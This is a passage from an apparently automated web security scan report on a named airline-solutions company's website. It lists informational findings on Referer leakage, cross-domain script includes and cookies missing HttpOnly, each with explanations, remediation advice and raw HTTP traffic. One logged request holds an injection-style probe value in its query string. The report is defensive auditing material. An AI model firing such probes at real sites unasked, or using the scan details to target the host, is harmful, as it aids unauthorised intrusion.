<td><input type="checkbox" name="sales" value="y" id="sales" /></td>
<td><label for="sales">I would like a sales representative to contact me</label></td>
</tr>
<tr>
<td><label for="colleague">colleague(s)</label></td>
<td><textarea name="colleague" id="colleague"></textarea></td>
</tr>
<tr>
<td><input type="checkbox" name="subscribe" value='y' id="subscribe" /></td>
<td><label for="subscribe">YES, I would like to receive e-mail with more information on Sabre Airline
Solutions... </label></td>
</tr>

<tr>
<td></td>
<td><input type="submit" class="pp_submit" value="submit" /></td>
</tr>
</table>
<br />
<div class="error"><span></span></div>
</form>
</div>
</div>

</body>
</html>

7. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /home/news_events?%0048092<a>12e2bef5c79=1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Cookie: exp_last_visit=970953067; exp_last_activity=1286313086; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286313086; expires=Wed, 05-Oct-2011 18:17:38 GMT; path=/
Set-Cookie: exp_last_activity=1286320658; expires=Wed, 05-Oct-2011 18:17:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 18:17:40 GMT
Pragma: no-cache
Content-Length: 7791
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<br />
           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1475404&highlight=" target="_blank">Sabre Holdings acquires flight planning company f:wz</a>
...[SNIP]...
<br />
           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1474743&highlight=" target="_blank">Sabre President Tapped by U.S. Commerce Secretary to encourage tourism to the United States</a>
...[SNIP]...
<br />
           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1474241&highlight=" target="_blank">TRIP Linhas A..reas selects SabreSonic CSS reservations system, Sabre operations solutions</a>
...[SNIP]...
<br />
           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1465117&highlight=" target="_blank">Airphil Express stays with Sabre for rebirth and growth</a>
...[SNIP]...
<br />
           <a href="http://www.sabre-holdings.com/newsroom/pdfs/Sam-Gilliland-NBTA-2010.pdf" target="_blank"><strong>
...[SNIP]...
<br />
                   <a href="http://www.sabre-events.com/2010-airvision-design-conference">AirVision Design Conference - London England</a>
...[SNIP]...
<p>Committed to minimizing the environmental impact of our global operations and to promoting sustainable business practices in travel and tourism. <a href="http://www.sabre-holdings.com/aboutUs/corporate/sustainability.html">www.sabre-holdings.com</a>
...[SNIP]...
<p>Get online access to all the product resources you need with the <a href="http://community.sabre.com"><em>
...[SNIP]...
<li id="careers"><a href="http://sabre-holdings.com/careers/index.html">Careers</a>
...[SNIP]...
<li id="holdings"><a href="http://www.sabre-holdings.com">Sabre Holdings</a>
...[SNIP]...

8. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/search/show_results

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /home/search/show_results HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 16:12:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286313150; expires=Wed, 05-Oct-2011 16:12:31 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 16:12:42 GMT
Pragma: no-cache
Content-Length: 5414
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...

9. Cookie without HttpOnly flag set  previous  next
There are 215 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



9.1. http://www.sabreairlinesolutions.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_